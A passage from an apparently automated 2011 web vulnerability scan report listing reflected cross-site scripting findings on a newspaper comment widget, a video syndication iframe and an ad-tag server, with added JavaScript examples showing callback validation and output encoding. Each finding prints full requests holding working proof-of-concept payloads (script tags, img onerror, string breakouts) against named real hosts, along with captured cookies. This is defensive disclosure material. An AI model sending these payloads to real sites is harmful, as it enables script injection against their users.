Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SiteLifeHost=gnvm25l3pluckcom; anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; desmoinesprod=R4082863653

Response

HTTP/1.1 200 OK
Set-Cookie: desmoinesprod=R4082863653; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm25l3pluckcom
Set-Cookie: SiteLifeHost=gnvm25l3pluckcom; domain=desmoinesregister.com; path=/
Date: Mon, 14 Feb 2011 01:38:00 GMT
Content-Length: 114659

plcb04bc88<script>alert(1)</script>6ade5d8e487('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\">
...[SNIP]...
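The hardened shape of the endpoint above, as an added example; this is not code from the report or from the SiteLife/Pluck application behind jsonp.app. The callback name plcb0 and the scanner payload come from finding 1.250; the functions isValidCallback, jsonForScript, renderJsonpUnsafe, renderJsonpSafe and deliver are hypothetical names, and the responder returns a {status, headers, body} object instead of writing to a socket so that it can be exercised offline.

```javascript
// Added example (not from the report or the SiteLife/Pluck application): a
// JSONP responder that treats the callback name as an identifier rather than
// as text to echo. Names below are hypothetical; plcb0 and the payload used in
// the usage note are the report's.

// A callback must be a (dotted) JavaScript identifier: jQuery-style names such
// as plcb0 or jQuery17105.cb pass, anything containing <, >, (, ; or quotes fails.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

function isValidCallback(name) {
  return typeof name === 'string' && name.length <= 64 && CALLBACK_RE.test(name);
}

// Serialise the argument so that it cannot terminate the surrounding script:
// JSON.stringify leaves "<" and the line terminators U+2028/U+2029 untouched.
function jsonForScript(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// The shape finding 1.250 exhibits: whatever arrived in cb is concatenated in
// front of the call, so the callback name is attacker-supplied JavaScript source.
function renderJsonpUnsafe(cb, payload) {
  return cb + '(' + JSON.stringify(payload) + ');';
}

// Hardened responder: an invalid callback is a 400 and is never reflected; the
// body is declared as script and marked nosniff so no browser renders it as
// HTML; the leading comment keeps the body from being parsed as some other
// format (the "Rosetta Flash" trick against JSONP endpoints).
function renderJsonpSafe(cb, payload) {
  const headers = {
    'Content-Type': 'application/javascript; charset=utf-8',
    'X-Content-Type-Options': 'nosniff',
  };
  if (!isValidCallback(cb)) {
    return { status: 400, headers, body: '/* invalid callback name */' };
  }
  return { status: 200, headers, body: '/**/' + cb + '(' + jsonForScript(payload) + ');' };
}

// Client side: evaluate a response body the way <script src> would, with the
// (simple, undotted) callback name bound, and return what the callback received.
function deliver(body, cbName) {
  let received;
  new Function(cbName, body)((v) => { received = v; });
  return received;
}
```

With the scanner's cb value, renderJsonpUnsafe emits plcb04bc88<script>alert(1)</script>6ade5d8e487({}); while renderJsonpSafe returns a 400 whose body contains none of the input; with cb=plcb0 and a payload holding the report's <div class="pluck-app-processing"> fragment, the safe body contains no raw "<" yet deliver() hands the callback the original string unchanged.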

1.251. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.desmoinesregister.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkey request parameter is copied into the value of an HTML tag attribute. The payload 3e0d6><img%20src%3da%20onerror%3dalert(1)>c7ec34ac8ea was submitted in the plckcommentonkey parameter. This input was echoed as 3e0d6><img src=a onerror=alert(1)>c7ec34ac8ea in the application's response.

The scanner classified the attribute as unquoted, but the response excerpt below shows the value inside a double-quoted attribute (commentOnKey=\"...\"), which in turn sits inside the single-quoted JavaScript string handed to the JSONP callback. A payload that contains no double quote does not leave a quoted attribute, so the captured response shows the characters <, > and = reaching the attribute unencoded but does not by itself show the injected <img> tag and its onerror handler being parsed as markup. Confirm the finding manually before treating it as exploitable (the value is reflected without any HTML encoding, so a payload that includes a double quote is the obvious check). The fix is to HTML-attribute-encode the value and then escape the result for the JavaScript string it is embedded in.

Request

GET /ver1.0/sys/jsonp.app?widget_path=uscp/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=20110211.DMRBlogs.1101133e0d6><img%20src%3da%20onerror%3dalert(1)>c7ec34ac8ea&plckitemsperpage=10&clientUrl=http%3A%2F%2Fblogs.desmoinesregister.com%2Fdmr%2Findex.php%2F2011%2F02%2F11%2Fdaniels-at-cpac-calls-for-broad-civil-conservative-coalition%2F&cb=plcb0 HTTP/1.1
Host: sitelife.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SiteLifeHost=gnvm25l3pluckcom; anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; desmoinesprod=R4082863653

Response

HTTP/1.1 200 OK
Set-Cookie: desmoinesprod=R4082863653; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm25l3pluckcom
Set-Cookie: SiteLifeHost=gnvm25l3pluckcom; domain=desmoinesregister.com; path=/
Date: Mon, 14 Feb 2011 01:36:59 GMT
Content-Length: 53645

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_comments_5090\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"20110211.DMRBlogs.1101133e0d6><img src=a onerror=alert(1)>c7ec34ac8ea\" commentOnKeyType=\"article\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

1.252. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.desmoinesregister.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the plckcommentonkeytype request parameter is copied into the value of an HTML tag attribute. The payload 2c5a9><img%20src%3da%20onerror%3dalert(1)>5193ab9e1da was submitted in the plckcommentonkeytype parameter. This input was echoed as 2c5a9><img src=a onerror=alert(1)>5193ab9e1da in the application's response.

As with the plckcommentonkey finding, the scanner reports an unquoted attribute, but the response excerpt below shows the value inside a double-quoted attribute (commentOnKeyType=\"...\") inside the single-quoted JavaScript string passed to the JSONP callback. The payload contains no double quote, so the captured response shows the value reflected without HTML encoding but does not show the injected <img> tag and its onerror handler leaving the attribute. Confirm manually before treating the finding as exploitable; the fix is HTML attribute encoding followed by JavaScript string escaping.

Request

GET /ver1.0/sys/jsonp.app?widget_path=uscp/pluck/comments.app&plckcommentonkeytype=article2c5a9><img%20src%3da%20onerror%3dalert(1)>5193ab9e1da&plckcommentonkey=20110211.DMRBlogs.110113&plckitemsperpage=10&clientUrl=http%3A%2F%2Fblogs.desmoinesregister.com%2Fdmr%2Findex.php%2F2011%2F02%2F11%2Fdaniels-at-cpac-calls-for-broad-civil-conservative-coalition%2F&cb=plcb0 HTTP/1.1
Host: sitelife.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SiteLifeHost=gnvm25l3pluckcom; anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; desmoinesprod=R4082863653

Response

HTTP/1.1 200 OK
Set-Cookie: desmoinesprod=R4082863653; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm25l3pluckcom
Set-Cookie: SiteLifeHost=gnvm25l3pluckcom; domain=desmoinesregister.com; path=/
Date: Mon, 14 Feb 2011 01:36:22 GMT
Content-Length: 53997

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
68\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"20110211.DMRBlogs.110113\" commentOnKeyType=\"article2c5a9><img src=a onerror=alert(1)>5193ab9e1da\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

1.253. http://sitelife.desmoinesregister.com/ver1.0/sys/jsonp.app [plckitemsperpage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.desmoinesregister.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The value of the plckitemsperpage request parameter is copied into the value of an HTML tag attribute. The payload d30a4><img%20src%3da%20onerror%3dalert(1)>1787fb2f0f9 was submitted in the plckitemsperpage parameter. This input was echoed as d30a4><img src=a onerror=alert(1)>1787fb2f0f9 in the application's response.

As with the two preceding findings, the scanner reports an unquoted attribute, but the response excerpt below shows the value inside a double-quoted attribute (itemsperpage=\"...\") inside the single-quoted JavaScript string passed to the JSONP callback. The payload contains no double quote, so the captured response shows the value reflected without HTML encoding but does not show the injected <img> tag and its onerror handler leaving the attribute. Confirm manually before treating the finding as exploitable. This parameter is a page size; beyond output encoding, the application should accept only an integer here.

Request

GET /ver1.0/sys/jsonp.app?widget_path=uscp/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=20110211.DMRBlogs.110113&plckitemsperpage=10d30a4><img%20src%3da%20onerror%3dalert(1)>1787fb2f0f9&clientUrl=http%3A%2F%2Fblogs.desmoinesregister.com%2Fdmr%2Findex.php%2F2011%2F02%2F11%2Fdaniels-at-cpac-calls-for-broad-civil-conservative-coalition%2F&cb=plcb0 HTTP/1.1
Host: sitelife.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SiteLifeHost=gnvm25l3pluckcom; anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; desmoinesprod=R4082863653

Response

HTTP/1.1 200 OK
Set-Cookie: desmoinesprod=R4082863653; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm25l3pluckcom
Set-Cookie: SiteLifeHost=gnvm25l3pluckcom; domain=desmoinesregister.com; path=/
Date: Mon, 14 Feb 2011 01:37:36 GMT
Content-Length: 53856

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...
<div id=\"pluck_comments_87422\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10d30a4><img src=a onerror=alert(1)>1787fb2f0f9\" sort=\"TimeStampAscending\" filter=\"\" commentOnKey=\"20110211.DMRBlogs.110113\" commentOnKeyType=\"article\" pagerefresh=\"false\" listtype=\"full\">
...[SNIP]...

1.254. http://syndicated.mondominishows.com/custom/vertical600iframe.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicated.mondominishows.com
Path:   /custom/vertical600iframe.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e6ca"><script>alert(1)</script>7c1462a336b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7e6ca\"><script>alert(1)</script>7c1462a336b in the application's response. The backslash in the echoed value shows that the application escapes quotes with a backslash (addslashes-style, consistent with PHP magic quotes on a .php endpoint) instead of HTML-encoding them. An HTML parser gives a backslash no meaning, so the double quote still terminates the src attribute and the injected <script> element is parsed as a real element. The value needs HTML attribute encoding, and since it is being placed inside a URL, URL encoding as well, before it is written into the tag.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /custom/vertical600iframe.php?pubsite_id=15009&pr=1/7e6ca"><script>alert(1)</script>7c1462a336b5246 HTTP/1.1
Host: syndicated.mondominishows.com
Proxy-Connection: keep-alive
Referer: http://www.haaretz.com/news/diplomacy-defense/report-palestinian-cabinet-to-resign-in-wake-of-mideast-turmoil-1.343218
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Mon, 14 Feb 2011 01:36:59 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-jhaghgkk=327B72C701B040B7AA1687E0DA3C2104; path=/
Content-Length: 1223


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>CindyClips Synd
...[SNIP]...
<script type="text/javascript" src="http://syndicated.mondominishows.com/tracker.php?pubsite_id=15009&pr=1/7e6ca\"><script>alert(1)</script>7c1462a336b5246">
...[SNIP]...

1.255. http://syndicated.mondominishows.com/custom/vertical600iframe.php [pr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicated.mondominishows.com
Path:   /custom/vertical600iframe.php

Issue detail

The value of the pr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f78d6"><script>alert(1)</script>69a7616f754 was submitted in the pr parameter. This input was echoed as f78d6\"><script>alert(1)</script>69a7616f754 in the application's response. As in 1.254, the backslash before the quote is addslashes-style escaping that an HTML parser ignores; the double quote still closes the src attribute and the injected element is live.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /custom/vertical600iframe.php?pubsite_id=15009&pr=15246f78d6"><script>alert(1)</script>69a7616f754 HTTP/1.1
Host: syndicated.mondominishows.com
Proxy-Connection: keep-alive
Referer: http://www.haaretz.com/news/diplomacy-defense/report-palestinian-cabinet-to-resign-in-wake-of-mideast-turmoil-1.343218
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Mon, 14 Feb 2011 01:36:59 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-jhaghgkk=734E049A619C78796B6D0F1A9CD7EBD0; path=/
Content-Length: 1221


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>CindyClips Synd
...[SNIP]...
<script type="text/javascript" src="http://syndicated.mondominishows.com/tracker.php?pubsite_id=15009&pr=15246f78d6\"><script>alert(1)</script>69a7616f754">
...[SNIP]...

1.256. http://syndicated.mondominishows.com/custom/vertical600iframe.php [pubsite_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicated.mondominishows.com
Path:   /custom/vertical600iframe.php

Issue detail

The value of the pubsite_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 997b7"><script>alert(1)</script>a84b9ee361d was submitted in the pubsite_id parameter. This input was echoed as 997b7\"><script>alert(1)</script>a84b9ee361d in the application's response. As in 1.254, the backslash before the quote is addslashes-style escaping that an HTML parser ignores; the double quote still closes the src attribute and the injected element is live. pubsite_id is a numeric identifier, so the application should also reject anything that is not an integer.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /custom/vertical600iframe.php?pubsite_id=15009997b7"><script>alert(1)</script>a84b9ee361d&pr=15246 HTTP/1.1
Host: syndicated.mondominishows.com
Proxy-Connection: keep-alive
Referer: http://www.haaretz.com/news/diplomacy-defense/report-palestinian-cabinet-to-resign-in-wake-of-mideast-turmoil-1.343218
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Mon, 14 Feb 2011 01:36:59 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-jhaghgkk=4BB31D516EB9DC054E43E04B9C9C8368; path=/
Content-Length: 1221


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>CindyClips Synd
...[SNIP]...
<script type="text/javascript" src="http://syndicated.mondominishows.com/tracker.php?pubsite_id=15009997b7\"><script>alert(1)</script>a84b9ee361d&pr=15246">
...[SNIP]...
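The two attribute-context reflections above (the quoted attribute inside a JSONP string in 1.251 to 1.253, and the backslash-escaped src attribute in 1.254 to 1.256), reproduced as an added example; this is not code from the report or from the Pluck/SiteLife or mondominishows applications. The payloads, attribute names and the tracker.php URL are the report's; htmlAttrEncode, addslashesLike, jsStringEscape, readDoubleQuotedAttr, renderTrackerTag, leaksMarkup, renderCommentsJsonp and roundTripCommentOnKey are hypothetical names, and addslashesLike is an assumption about what inserted the backslash seen in the echoed values.

```javascript
// Added example; not code from the report or from the applications it
// describes. Rebuilds the attribute reflections of findings 1.251-1.256 with
// the report's own payloads and shows which encoder each context needs.
// addslashesLike() is an assumption about what produced the backslash seen in
// the echoed values of 1.254-1.256.

// HTML attribute encoding: keeps any value inside a double-quoted attribute.
function htmlAttrEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// PHP-style addslashes(): a backslash before quotes and backslashes. This is
// SQL-flavoured escaping; an HTML parser gives the backslash no meaning.
function addslashesLike(s) {
  return String(s).replace(/[\\'"]/g, (c) => '\\' + c);
}

// Escaping for a value placed inside a JavaScript string literal, which is
// where the HTML of the JSONP responses in 1.251-1.253 lives. Every character
// that could end the literal, the script, or the line becomes \uXXXX.
function jsStringEscape(s) {
  return String(s).replace(/[\\'"<\n\r\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Minimal reader for one double-quoted attribute, following the HTML rule that
// the value ends at the next '"' and a backslash is an ordinary character.
function readDoubleQuotedAttr(html, name) {
  const start = html.indexOf(name + '="');
  if (start < 0) return null;
  const from = start + name.length + 2;
  const end = html.indexOf('"', from);
  return { value: html.slice(from, end), rest: html.slice(end + 1) };
}

// The tracker tag of 1.254-1.256 with the pr value passed through an encoder.
function renderTrackerTag(pr, encode) {
  return '<script type="text/javascript" src="http://syndicated.mondominishows.com/tracker.php?pubsite_id=15009&pr=' +
    encode(pr) + '"></script>';
}

// True when injected markup ends up outside the src attribute.
function leaksMarkup(pr, encode) {
  const { rest } = readDoubleQuotedAttr(renderTrackerTag(pr, encode), 'src');
  return /<[a-z]/i.test(rest);
}

// The comments <div> of 1.251-1.253, shipped inside the JSONP string argument.
// Nested contexts are encoded inside-out: HTML attribute first, JS string second.
function renderCommentsJsonp(commentOnKey) {
  const div = '<div id="pluck_comments_5090" class="pluck-app pluck-comm" commentOnKey="' +
    htmlAttrEncode(commentOnKey) + '" commentOnKeyType="article">';
  return "plcb0('" + jsStringEscape(div) + "');";
}

// Client side of that call: run the script with plcb0 bound, read the attribute
// back out of the HTML the callback received, and decode it. The result should
// be exactly the value that went in, whatever it contained.
function roundTripCommentOnKey(commentOnKey) {
  let received = null;
  new Function('plcb0', renderCommentsJsonp(commentOnKey))((html) => { received = html; });
  const { value } = readDoubleQuotedAttr(received, 'commentOnKey');
  const map = { amp: '&', lt: '<', gt: '>', quot: '"', '#x27': "'" };
  return value.replace(/&(amp|lt|gt|quot|#x27);/g, (m, e) => map[e]);
}
```

Run against the report's values, leaksMarkup reports that the pr payload escapes the src attribute both when reflected verbatim and after addslashesLike (the backslash changes nothing for the HTML parser) but not after htmlAttrEncode, while the plckcommentonkey payload, which holds no double quote, never leaves a quoted attribute at all. roundTripCommentOnKey shows the inside-out encoding surviving a value containing quotes, backslashes and an existing entity.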

1.257. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7e01"%3balert(1)//418a5dd2e6f was submitted in the action parameter. This input was echoed as e7e01";alert(1)//418a5dd2e6f in the application's response. The injected characters close the string, terminate the statement with a semicolon and comment out the remainder of the line with //, which is why the var declarations that follow on that line vanish from the parsed script. Note the context: the response is a script resource (Content-Type: application/x-javascript) that publisher pages load with <script src>, so the injected statement runs in the origin of whichever page embeds the tag with an attacker-influenced parameter value; opened directly, the URL is displayed as text rather than rendered. The fix is to serialise each query value as a JavaScript string literal (JSON.stringify plus escaping of < and of U+2028/U+2029) and to validate the numeric and enumerated parameters before they reach the template.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWADe7e01"%3balert(1)//418a5dd2e6f&cwrun=200&cwadformat=300X250&cwpid=526735&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=80710 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB21
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: -702944365
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5704
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:40 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TAGPUBLISH/getad.aspx";var cp="526735";var ct="80710";var cf="300X250";var ca="VIEWADe7e01";alert(1)//418a5dd2e6f";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;va
...[SNIP]...

1.258. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5a22"%3balert(1)//61ab18cb0e was submitted in the cwadformat parameter. This input was echoed as d5a22";alert(1)//61ab18cb0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250d5a22"%3balert(1)//61ab18cb0e&cwpid=526735&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=80710 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=292|1|-8589035730497595512|1; V=gFEcJzqCjXJj; cwbh1=2709%3B03%2F15%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9%0A1518%3B03%2F06%2F2011%3BFOCI1%0A749%3B02%2F19%2F2011%3BDOTM2%0A2532%3B03%2F15%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
CW-Server: CW-WEB31
Cache-Control: public, must-revalidate, max-age=0
Last-Modified: Tue, 01 Feb 2011 18:17:28 GMT
ETag: -745973263
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5703
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 14 Feb 2011 01:36:40 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

